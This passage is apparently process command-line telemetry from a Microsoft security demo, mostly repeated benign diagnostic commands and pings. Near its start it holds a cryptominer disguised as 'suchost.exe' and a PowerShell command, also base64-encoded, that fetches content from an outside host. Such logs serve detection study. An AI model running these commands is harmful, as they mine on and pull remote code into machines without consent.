echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\".\\\\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\".\\\\powershell  -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps\\\"\",\".\\\\powershell  -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==\",\"cmd  /c echo End Security Demo tasks\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\speech_onecore\\\\common\\\\SpeechModelDownload.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 8 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -10918 /22284\",\"ping  127.0.0.1 -n 17 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 0 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -15855\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15855\\\"\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6735 /25041\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11793\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17426 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\26415\\\\9105.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18973 c:\\\\temp\\\\23899\\\\24432.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" C:\\\\diagnostics\\\\WinBenignActivity.cmd -18973 c:\\\\temp\\\\23899\\\\24432.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 14 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17484 /10137\",\"ping  127.0.0.1 -n 14 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15720\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11278 \",\"ping  127.0.0.1 -n 14 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"rundll32  \\\\15840\\\\26443.exe\",\"ping  127.0.0.1 -n 14 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4630 c:\\\\temp\\\\25730\\\\15188.ps1\",\"ping  127.0.0.1 -n 14 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -1140 \",\"ping  127.0.0.1 -n 18 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 28 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\18091\\\\18975.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -2752 c:\\\\temp\\\\12730\\\\16896.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -2752 c:\\\\temp\\\\12730\\\\16896.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 26 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1926 /21875\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -7320\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -7320\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10353 /21160\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14766\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3438 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\29395\\\\14699.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20237 c:\\\\temp\\\\2708\\\\27344.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18087 \",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"rundll32  \\\\24535\\\\23154.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10518 c:\\\\temp\\\\25582\\\\18184.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" C:\\\\diagnostics\\\\WinBenignActivity.cmd -10518 c:\\\\temp\\\\25582\\\\18184.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 26 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29592 /10339\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25460\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -564 \",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"rundll32  \\\\12420\\\\28156.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25005 c:\\\\temp\\\\13896\\\\18724.ps1\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 29 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 8 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 6 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -14404 /9352\",\"ping  127.0.0.1 -n 25 \",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 8 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -23146 /32625\",\"ping  127.0.0.1 -n 9 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 3 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -9090\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9090\\\"\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20009 /26500\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14236\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15522 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\6038\\\\18193.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -19863 c:\\\\temp\\\\5632\\\\6712.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 11 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 29 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 20 \",\"ping  127.0.0.1 -n 22 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 2 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 2 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\AppHostRegistrationVerifier.exe\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe StartScan\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 11 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -29451 /17352\",\"ping  127.0.0.1 -n 18 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -22746\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22746\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32357 /19904\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6768\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2077 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\557\\\\12356.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -23465 c:\\\\temp\\\\11303\\\\1053.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 16 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -22744 \",\"ping  127.0.0.1 -n 26 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 12 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 6 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\28294\\\\1236.exe\",\"ping  127.0.0.1 -n 24 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -27872 c:\\\\temp\\\\25394\\\\262.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -27872 c:\\\\temp\\\\25394\\\\262.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 24 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21672 /6837\",\"ping  127.0.0.1 -n 24 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2162\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2162\\\"\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9125 /15106\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22743\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9472 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\24845\\\\2750.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30329 c:\\\\temp\\\\9676\\\\24368.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26149 \",\"ping  127.0.0.1 -n 24 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 